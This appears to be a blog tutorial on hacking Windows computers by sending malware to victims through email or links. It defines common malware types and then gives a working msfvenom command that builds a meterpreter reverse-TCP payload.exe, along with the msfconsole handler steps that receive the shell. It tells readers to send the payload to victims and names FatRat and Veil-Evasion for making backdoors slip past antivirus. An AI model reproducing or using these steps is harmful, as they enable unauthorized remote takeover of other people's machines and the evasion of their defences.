There are many methods to hack windows but one of the method is to send the malware, Trojan, backdoor or botnet to your victim via your social engineering techniques i.e. send the payload through email or via a link. When your victims run your Trojan or malware you will get reverse shell/tcp depends on your payload type.
What
is Malware?
Malware
is a piece of malicious code or executable that hacker use to gain access to
the systems of his victim. Malware is usually found in emails, fraud links
pretending to give you job offer and many other techniques.
Types of Malwares:
-
1)
Trojan
2)
Adware
3)
Fileless Malware
4)
Viruses
5)
Worms
6)
Botnets
7)
Ransomware
8)
Spyware
Trojans: -
Trojan is a type of malware pretending to be a legitimate software
but in fact in would be malicious. A Hacker usually bind Trojan Malwares with
legit software and send to his victims. Hacker can send you Trojans in
antivirus software and any application that hacker would trap you in his net.
Adware: -
Adware commonly called “Spam” because it shows you a lot of advertisements
in your pc and the ads link can be malicious.
Fileless Malware: -
As common Malwares uses executable files to infect Devices. But
Fileless malwares do not infect your system directly, these types of malwares
are found in Microsoft office’s Macros which in-directly infect your PC.
Viruses:
-
Virus is the type of malware that infect other
programs or applications and can spread in the network. It corrupt, delete or
move your data.
Worms:
-
Like Viruses, Worms can duplicate themselves too and spread in
the devices. Worms do not need human action to spread once they are in a
network or system.
Botnets:
-
A bot is a software program that performs an automated task
without requiring any interaction. Bots can execute attacks much faster than
humans ever could. Bots can spread there bots in the Network if one
device got infected. Bots spread in devices and make there own botnet network
which will help the attacker in DDOS and Brute force attacks.
Ransomware:
-
Ransomware Malwares encrypt all Data in the device and hold for
ransom. The Attacker warns his victim to pay the ransom on time before he
deletes the data or sell in the Dark web.
Spyware:
-
Black Hat Hackers use Spyware to monitor the activities in their
victims. Spywares are usually used in credential thefts like username,
passwords or credit card numbers. Common type of Spyware is Key Logger.
Some
of the famous tools for payload creation are as under;
1) Metasploit
2) FatRat
3) Veil
evasion
Metasploit: -
Metasploit is an open source malware creating tools
that helps the pentesters to test their Network’s security.
To
hack windows use this command in metasploit
msfvenom -p windows/meterpreter/reverse_tcp
lhost=(yourIP) 10.0.2.15 lport=(yourport)4444 -f exe -o payload.exe
Open new terminal and type the following commands
è Msfconsole
è use
multi/handler
è set
payload windows/meterpreter/reverse_tcp
è set
lhost 10.0.2.15 (yourIP)
è set
lport 4444 (yourport)
è exploit
After this send the
payload to your victims, on execution you will get reverse tcp connection.
FatRat: -
FatRat
is one of the famous tools for pentesters. Fatrat comes with a lot of features
like Undetectable backdoor for Windows and Android. You can download the FatRat
from GitHub and type help you will get all details.
Veil evasion: -
Veil
evasion is a famous tool used to encrypt or make metasploit backdoors
undetectable. Sometime metasploit backdoor are detected by antivirus so veil
evasion solve this problem for hackers and make metasploit backdoor undetectable
and can easily bypass antiviruses.
0 Comments